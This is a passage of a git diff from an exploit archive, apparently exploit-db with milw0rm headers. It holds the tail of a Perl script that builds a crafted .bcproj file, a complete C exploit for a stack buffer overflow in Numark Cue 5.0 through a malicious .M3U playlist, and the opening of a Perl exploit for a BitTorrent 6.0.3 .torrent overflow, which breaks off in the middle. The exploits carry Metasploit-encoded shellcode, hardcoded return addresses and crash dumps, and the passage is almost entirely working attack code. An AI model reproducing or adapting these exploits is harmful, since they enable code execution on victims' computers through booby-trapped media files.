"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". + "\x62\x73\x73\x65\x0C\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x10\x00\x00\x00". + "\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00". + "\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00". + "\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00". + "\x00\x00\xB0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00". + "\x02\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F". + "\x00\x00\x00\x00\x00\x00\xC0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00". + "\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x03\x00\x00\x00\x03\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xC8\x3F\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65". + "\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". + "\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xD0\x3F\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x64\x00\x00\x00". + "\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xD4\x3F". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00". + "\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00". + "\x00\x00\xD8\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00". + "\x07\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F". + "\x00\x00\x00\x00\x00\x00\xDC\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00". + "\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00". + "\x00\x00\x00\x00\x08\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE0\x3F\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65". + "\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x02\x00\x00\x00\x01\x00\x00\x00\x09\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". + "\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE2\x3F\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x0A\x00\x00\x00\x64\x00\x00\x00". + "\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE4\x3F". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x0B\x00\x00\x00". + "\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00". + "\x00\x00\xE6\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00". + "\x0C\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F". + "\x00\x00\x00\x00\x00\x00\xE8\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00". + "\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00". + "\x01\x00\x00\x00\x0D\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEA\x3F\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65". 
+ "\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x03\x00\x00\x00\x02\x00\x00\x00\x0E\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". + "\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEC\x3F\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x0F\x00\x00\x00\x64\x00\x00\x00". + "\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEE\x3F". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x62\x73\x65\x71\x24\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x01\x00\x00\x00\x62\x73\x71\x6F\x38\x00\x00\x00\x00\x00\x80\x3F". + "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x71\x6F\x38\x00\x00\x00". + "\x00\x00\x80\x3F\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x65\x71". + "\x08\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00"; + + +open (MYFILE, '>>POC.bcproj'); +binmode(MYFILE); +print MYFILE "$tuff"; +close (MYFILE); +print "Exploit file has been created. ( POC.bcproj )\n"; + +# milw0rm.com [2008-08-30] diff --git a/platforms/windows/local/6389.cpp b/platforms/windows/local/6389.cpp index a0e387233..fa56878a9 100755 
--- a/platforms/windows/local/6389.cpp +++ b/platforms/windows/local/6389.cpp 
@@ -1,113 +1,113 @@ -/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow - This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption. - Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2. - - After preparation: - |Access violation when executing [58414158]| -EAX 00000001 -ECX 004C01B2 cue_tria.004C01B2 -EDX 01030608 -EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13. DMX - Life be my Song.mp3.jpg" -EBP 00000000 -ESI 016016E0 -EDI 00000000 -EIP 58414158 -Geetz to my friends Gil-Dong,Marsu,Expanders,Str0ke,Razvan,Vlad and all the people that I - know...find me in Regie. -*/ - -#include -#include -#include -#include - -#define OFFSET 549 - -//got this shellcode from metasploit - char shellcode[]= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63" -"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32" -"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38" -"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e" -"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62" -"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74" -"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c" -"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39" -"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b" -"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64" -"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37" -"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b" 
-"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
-"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
-"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
-"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
-"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
-"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
-"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
-"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
-"\x70\x63";
-
-
- char file_start[]=
-"\x23\x56\x69\x72\x74\x75\x61\x6C\x44\x4A"
-"\x20\x50\x6C\x61\x79\x6C\x69\x73\x74\x0D"
-"\x0A\x23\x4D\x69\x78\x54\x79\x70\x65\x3D"
-"\x53\x6D\x61\x72\x74\x0D\x0A\x49\x3A\x5C";
-
-
- char file_end[]=
-"\x72\x20\x4F\x66\x20\x54\x68\x65\x20\x44"
-"\x6F\x67\x20\x41\x67\x61\x69\x6E\x20\x28"
-"\x32\x30\x30\x36\x29\x5B\x54\x2D\x42\x6F"
-"\x79\x7A\x5D\x5C\x31\x33\x2E\x20\x44\x4D"
-"\x58\x20\x2D\x20\x4C\x69\x66\x65\x20\x62"
-"\x65\x20\x6D\x79\x20\x53\x6F\x6E\x67\x2E"
-"\x6D\x70\x33\x0D\x0A\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00";
-
- int main(int argc, char *argv[])
- { FILE *y;
- unsigned char *buffer;
- unsigned int offset=0;
- unsigned int NEW_EIP=0x7C8369F0;
-
- if(argc<2)
- {
- printf("****************************************\n");
- printf("USAGE IS:");
- printf("FileName.m3u\n");
- printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
- printf("****************************************\n");
- system("color 02");
- Sleep(2000);
-return 0;
- }
-
- if((y=fopen(argv[1],"wb"))==NULL)
- { printf("error");
- exit(0);
- }
-
- printf("************************************************************\n");
- printf("Numark Cue 5.0 rev 2 .M3U File Stack Buffer Overflow\n");
- printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
- printf("File successfully buit,open with Numark Cue :)\n");
- 
printf("************************************************************\n"); - system("color 03"); - - buffer=(unsigned char *)malloc(OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15); - memset(buffer,0x90,OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15); - memcpy(buffer,file_start,strlen(file_start)); offset=OFFSET; - memcpy(buffer+offset,&NEW_EIP,4); offset+=4; - offset+=15; - memcpy(buffer+offset,shellcode,strlen(shellcode)); offset+=strlen(shellcode); - memcpy(buffer+offset,file_end,strlen(file_end)); offset+=strlen(file_end); - fprintf(y,"%s",buffer); - -return 0; - } - -// milw0rm.com [2008-09-06] +/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow + This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption. + Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2. + + After preparation: + |Access violation when executing [58414158]| +EAX 00000001 +ECX 004C01B2 cue_tria.004C01B2 +EDX 01030608 +EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13. DMX - Life be my Song.mp3.jpg" +EBP 00000000 +ESI 016016E0 +EDI 00000000 +EIP 58414158 +Geetz to my friends Gil-Dong,Marsu,Expanders,Str0ke,Razvan,Vlad and all the people that I + know...find me in Regie. 
+*/
+
+#include
+#include
+#include
+#include
+
+#define OFFSET 549
+
+//got this shellcode from metasploit
+ char shellcode[]=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
+"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
+"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
+"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
+"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
+"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
+"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
+"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
+"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
+"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
+"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
+"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
+"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
+"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
+"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
+"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
+"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
+"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
+"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
+"\x70\x63";
+
+
+ char file_start[]=
+"\x23\x56\x69\x72\x74\x75\x61\x6C\x44\x4A"
+"\x20\x50\x6C\x61\x79\x6C\x69\x73\x74\x0D"
+"\x0A\x23\x4D\x69\x78\x54\x79\x70\x65\x3D"
+"\x53\x6D\x61\x72\x74\x0D\x0A\x49\x3A\x5C";
+
+
+ char file_end[]=
+"\x72\x20\x4F\x66\x20\x54\x68\x65\x20\x44"
+"\x6F\x67\x20\x41\x67\x61\x69\x6E\x20\x28"
+"\x32\x30\x30\x36\x29\x5B\x54\x2D\x42\x6F"
+"\x79\x7A\x5D\x5C\x31\x33\x2E\x20\x44\x4D" 
+"\x58\x20\x2D\x20\x4C\x69\x66\x65\x20\x62"
+"\x65\x20\x6D\x79\x20\x53\x6F\x6E\x67\x2E"
+"\x6D\x70\x33\x0D\x0A\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00";
+
+ int main(int argc, char *argv[])
+ { FILE *y;
+ unsigned char *buffer;
+ unsigned int offset=0;
+ unsigned int NEW_EIP=0x7C8369F0;
+
+ if(argc<2)
+ {
+ printf("****************************************\n");
+ printf("USAGE IS:");
+ printf("FileName.m3u\n");
+ printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
+ printf("****************************************\n");
+ system("color 02");
+ Sleep(2000);
+return 0;
+ }
+
+ if((y=fopen(argv[1],"wb"))==NULL)
+ { printf("error");
+ exit(0);
+ }
+
+ printf("************************************************************\n");
+ printf("Numark Cue 5.0 rev 2 .M3U File Stack Buffer Overflow\n");
+ printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
+ printf("File successfully buit,open with Numark Cue :)\n");
+ printf("************************************************************\n");
+ system("color 03");
+
+ buffer=(unsigned char *)malloc(OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15);
+ memset(buffer,0x90,OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15);
+ memcpy(buffer,file_start,strlen(file_start)); offset=OFFSET;
+ memcpy(buffer+offset,&NEW_EIP,4); offset+=4;
+ offset+=15;
+ memcpy(buffer+offset,shellcode,strlen(shellcode)); offset+=strlen(shellcode);
+ memcpy(buffer+offset,file_end,strlen(file_end)); offset+=strlen(file_end);
+ fprintf(y,"%s",buffer);
+
+return 0;
+ }
+
+// milw0rm.com [2008-09-06]
diff --git a/platforms/windows/local/6787.pl b/platforms/windows/local/6787.pl
index a7d9ba424..d2a16ece1 100755
--- a/platforms/windows/local/6787.pl
+++ b/platforms/windows/local/6787.pl
@@ -1,176 +1,176 @@ -#!/usr/bin/perl -# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit -# 09/21/2008 by k`sOSe && oVeret - -use warnings; -use strict; - -# If you change this(avoid \x80->\x9f unless you really know what you are doing) you must also change the length value of the decoder -my $shellcode = -# windows/exec CMD="C:\WINDOWS\system32\calc.exe" -#[*] x86/alpha_mixed succeeded, final size 337 -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" . -"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41" . -"\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" . -"\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x51" . -"\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c" . -"\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a\x4f\x4c\x4b\x50" . -"\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51" . -"\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49" . -"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x43\x37\x49" . -"\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" . -"\x4b\x50\x54\x47\x54\x43\x34\x43\x45\x4d\x35\x4c\x4b\x51" . -"\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50" . -"\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45" . -"\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45" . -"\x54\x48\x43\x51\x4f\x46\x51\x4b\x46\x45\x30\x46\x36\x45" . -"\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c" . -"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4d" . -"\x59\x4b\x48\x4d\x53\x49\x50\x42\x4a\x50\x50\x45\x38\x4a" . -"\x50\x4c\x4a\x43\x34\x51\x4f\x45\x38\x4c\x58\x4b\x4e\x4c" . -"\x4a\x44\x4e\x50\x57\x4b\x4f\x4a\x47\x50\x43\x46\x5a\x51" . -"\x4c\x46\x37\x50\x49\x50\x4e\x51\x54\x50\x4f\x50\x57\x50" . -"\x53\x51\x4c\x42\x53\x43\x49\x44\x33\x44\x34\x45\x35\x42" . -"\x4d\x50\x33\x46\x52\x51\x4c\x42\x43\x43\x51\x42\x4c\x45" . -"\x33\x46\x4e\x43\x55\x42\x58\x42\x45\x43\x30\x44\x4a\x41" . 
-"\x41"; - -$shellcode .= "\x87\x87"; # -> \x21\x20\x21\x20 -> EGG ( for english windows version ) - -my $ret = "\x3f\x41"; # -> unicode friendly pop,pop,ret - -# unicode friendly get_EIP (needed by the venetian decoder) -sub get_eip -{ - #0041 00 ADD BYTE PTR DS:[ECX],AL - #5F POP EDI - #0041 00 ADD BYTE PTR DS:[ECX],AL - #5F POP EDI - #0041 00 ADD BYTE PTR DS:[ECX],AL - #6A 00 PUSH 0 - #58 POP EAX - #0041 00 ADD BYTE PTR DS:[ECX],AL - #57 PUSH EDI - #0041 00 ADD BYTE PTR DS:[ECX],AL - #54 PUSH ESP - #0041 00 ADD BYTE PTR DS:[ECX],AL - #5A POP EDX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - #0042 00 ADD BYTE PTR DS:[EDX],AL - #40 INC EAX - 